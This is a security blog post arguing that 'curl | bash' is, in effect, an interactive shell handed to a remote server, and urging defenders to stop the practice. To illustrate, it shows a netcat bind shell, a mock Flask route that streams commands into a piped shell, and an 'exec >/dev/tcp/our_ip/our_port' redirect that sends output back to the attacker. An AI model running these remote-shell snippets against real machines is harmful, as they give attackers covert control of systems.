Or: please, please, stop piping curl into bash in prod.

TL;DR: A shell’s built-in understanding (and the conventional understanding) of its own interactivity is different from what might be considered interactive from a security perspective. From a defensive security point of view, piping curl into bash is indistinguishable from an interactive shell. Because of the halting problem (kinda).

‘TL;DR’TL;DR: My head hurts and I want to go home.

Interactive shells mean something bad happened, right?

Interactive shells in production are generally a bad sign, right? In modern infrastructure, if you’re using some infrastructure-as-code tool, you’re probably never shelling into a Linux box unless something has gone horribly wrong. And you probably want to avoid doing so if it’s at all possible, because of how error prone it can be to fix production issues this way. Cattle, not pets, right? And barring those something-has-gone-terribly-wrong circumstances, an interactive shell is likely the sign of an attacker… right? So you probably want to know when an interactive shell is opened on a production system, right?


What even is an interactive shell? Nobody has ever explained it to me.

I want you to think about what an interactive shell is before you keep reading. Write it down if you have to. You’re probably wrong. From a certain point of view, anyway.

I asked some friends this question and got a mix of answers.

Question for the class: if I tell you I have two bash pids, 123 and 456, and then I tell you “123 is interactive, but 456 is not” what is the difference between them?

One answer was “123 was spawned from a TTY and 456 was not.” This might seem like a good answer, but you can definitely spawn an interactive shell without a TTY involved.

$ docker run --rm ubuntu:22.04 \
    bash -c 'echo -n '"'"'echo $- && ls -l /proc/$$/fd'"'"' | bash -i'

bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@7aa6f2237867:/# echo $- && ls -l /proc/$$/fd
total 0
lr-x------ 1 root root 64 May  5 15:35 0 -> pipe:[52434]
l-wx------ 1 root root 64 May  5 15:35 1 -> pipe:[50764]
l-wx------ 1 root root 64 May  5 15:35 2 -> pipe:[50765]
l-wx------ 1 root root 64 May  5 15:35 255 -> pipe:[50765]
root@7aa6f2237867:/# exit

First we query bash for the flags it was started with ($-). We can see the i flag is present, and we can see the $PS1 prompt. This bash process believes itself to be interactive. It was not spawned from a TTY, and it is not interacting with a TTY from its own perspective, which we can see when we check its open file descriptors.

Another answer I got was along the lines of “123 is waiting for user input, and 456 is just executing a script.” That’s a better answer, but it’s still not quite correct. Here’s a script that will definitely interact with the user, but believes itself to be operating non-interactively.

$ echo -n '#!/usr/bin/env bash\necho $-\nread -n 1 -p "Press a key!" _\n' > tmp.sh
$ chmod +x tmp.sh
$ bash -c ./tmp.sh
Press a key!

As you can see, no i flag is set in the bash process running the script, but it waits for us to press a key before continuing. You might be thinking, “sure, the script is interactive, but the shell isn’t.” To which I say, “semantics.” Pretend I’m an adversary. I am interacting with this shell. It is interactive. Here’s a stronger (skid-ier?) example.

Terminal 1

$ nc.traditional -lvp 4444 -e /bin/bash 2>/dev/null

Terminal 2

$ nc localhost 4444
ls -l /proc/$$/fd
total 0
lrwx------ 1 senicar senicar 64 May  5 15:50 0 -> socket:[55727]
lrwx------ 1 senicar senicar 64 May  5 15:50 1 -> socket:[55727]
l-wx------ 1 senicar senicar 64 May  5 15:50 2 -> /dev/null
echo $-

No i flag. No TTY. No $PS1. Fully interactive. If you’ve done any kind of Linux offensive work, or, like, any CTF, you probably already know this.

What’s all this about an i flag, then?

Let’s shamelessly steal liberally draw inspiration from this stackexchange post. The i flag is set in bash when bash considers itself to be interactive. What defines bash as being non-interactive? Whatever bash does when you call it with -c. This function, that’s it. Non-interactive means no command history, no job management, no line editing, no prompt, and errors can’t be ignored. We’ve clearly demonstrated interactivity without these features, so the internal bash understanding of interactive clearly doesn’t match the security-oriented understanding.

There must be other definitions. Let’s check those!

Here’s what the glibc manual says:

The fundamental purpose of an interactive shell is to read commands from the user’s terminal and create processes to execute the programs specified by those commands.

In other words, interactive means that the shell’s standard input is a TTY. We know this isn’t necessary for interactivity. Next.

What about that warning apt gives you in a script? The one that says “Use with caution in scripts.” How is apt detecting interactivity in practice? Let’s check the source.

   if(!isatty(STDOUT_FILENO) &&
      _config->FindB("Apt::Cmd::Disable-Script-Warning", false) == false)
      std::cerr << std::endl
                << "WARNING: " << flNotDir(argv[0]) << " "
                << "does not have a stable CLI interface. "
                << "Use with caution in scripts."
                << std::endl
                << std::endl;

Oh, it’s checking if standard output is a TTY. We’ve already shown that’s not required for interactivity. Boo.

What about POSIX? Let’s look at how they specify sh. From POSIX’s perspective, sh is interactive if it’s started with -i, or if it has no arguments but standard input and standard output are a TTY. This is more constrained than apt, similar to what we see in glibc, and still not useful from a security perspective.

Please just tell me what “interactive” means to you.

My favorite answer to the “what distinguishes pid 123 from pid 456” question came from Patton Oswalt in Ratatouille.

Process 123 has a loop that alters its program flow to reach new branches pending input via file descriptors (e.g., stdin or the network) or process signals. Process 456 has a loop with a defined set of program flow branches that will be reached as defined by a preset configuration at the start of the process.

I think that’s perfect. An interactive shell (or interactive process in general) is one that sits and waits for something to happen to it, and that something determines control flow. A non-interactive program has all of its instructions known at the time it starts. It doesn’t sit around and wait for more, it just chugs along doing its thing. For example, bash -c 'echo "Hello, world!"' is non-interactive, because we know all the instructions before it starts. It won’t change, it won’t wait to receive more from stdin, or a pipe, or a socket. It echoes out “Hello, world!”, then exits. In contrast, nc -lvp 4444 | /bin/bash is interactive, even if we spawn it (like we did above) without the i flag or without a TTY being involved. Its control flow is being determined at runtime, based on whatever information is coming into it from a pipe, which is itself receiving information from the network. For it to be a shell and not just a process it should have some loop that performs arbitrary command interpretation, distinguishing an interactive shell from, say, a web server. Beautiful.

Wait a minute.

a defined set of program flow branches that will be reached as defined by a preset configuration at the start of the process

Ah crap, that’s the halting problem. Determining that a shell is non-interactive means determining that it will halt.

What does this have to do with curl and pipes?

Let’s just… ignore that. For a moment. In practice it’s not that big of a deal. Most scripts are simple enough that we can actually determine that they’ll halt. If you slap a -s -- -y to the end of the rust installer command, you can manually trace it doing its thing, then stopping. If you don’t start it with -y, you can see it starts waiting for user input (forever, if you ignore it). So if we can easily determine that this curl | sh will halt, and is non-interactive, why did I claim that it was interactive at the start of this post?

at the start of the process

When sh starts here, we don’t have the whole script. When you trace the script manually to watch it end, you’re doing so after it’s already been downloaded. When you pipe something into a shell directly from the network you are not running a script. You are giving an interactive shell to some web server and asking it to please do its thing thank you.

Most of the time this is actually fine. There’s no meaningful difference between downloading an installer off rustup.rs and giving them a shell. I’m trusting them to run code on my box either way. But if you’re, say, running a container in production there is a meaningful security difference between running an installer with a finite set of instructions and giving a third party service a shell.

Yes, you can still trust rustup.rs either way. But for your security team, from a behavioral perspective, running the installer by piping it into sh instead of running it off disk looks exactly the same as an adversary popping a shell on your box with nc. Your adversaries know this, and they’re laughing at you whenever you do it.

Back in 2016 someone wrote a blog post about detecting the use of curl | bash server side and selectively feeding an end user malicious code. The server is making a determination about what’s downloading from it, and feeding different content based on that determination. The interpreter on the victim side does different things based on that determination, because it’s not really non-interactive. It’s sitting in a loop, waiting for the next command to come in. It’s being interacted with.

We can take this concept and turn it into something human interactive. That is, we can take curl | sh, and give ourselves a shell. Here’s some mock python code for a flask app does just that. The remainder of the code is left as an exercise to the reader.

def shell_route():
    def generate():
        while True:
            cmd = input("$ ")
            yield f'{cmd}\necho {(chr(33) + "1") * 4096} >/dev/null\n'
    return app.response_class(stream_with_context(generate()), mimetype='text/plain')

This will let us send commands. If we want to get replies, we can do something like set up a listener with netcat send exec >/dev/tcp/our_ip/our_port as the first command. This will redirect output back to us. Bam, shell.

Why would you ever do this? I have no idea. There’s really no point. If someone is downloading and running your code, there’s no reason to go through the effort of making it interactive. It’s quite silly. But it does work! In an extremely reductive and pedantic sense, curl | sh is an interactive shell. And that tickles my brain. It also makes your security team’s job harder, so please stop doing it.